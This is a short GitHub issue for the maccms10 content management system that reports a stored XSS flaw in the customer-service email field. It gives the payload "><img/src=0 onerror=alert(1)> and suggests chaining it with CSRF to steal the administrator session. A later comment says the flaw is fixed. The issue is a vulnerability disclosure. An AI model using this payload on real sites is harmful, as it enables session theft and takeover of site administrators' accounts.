存在XSS漏洞 - Githubissues

maccmspro / maccms10

苹果cms-v10,maccms-v10,麦克cms,开源cms,内容管理系统,视频分享程序,分集剧情程序,网址导航程序,文章程序,漫画程序,图片程序

Apache License 2.0

648 stars 127 forks source link

Closed maccmspro closed 3 years ago

maccmspro commented 3 years ago

输入框在客服邮箱 payload:

"><img/src=0 onerror=alert(1)>

可以配合csrf 拿管理员session

maccmspro commented 3 years ago

已修复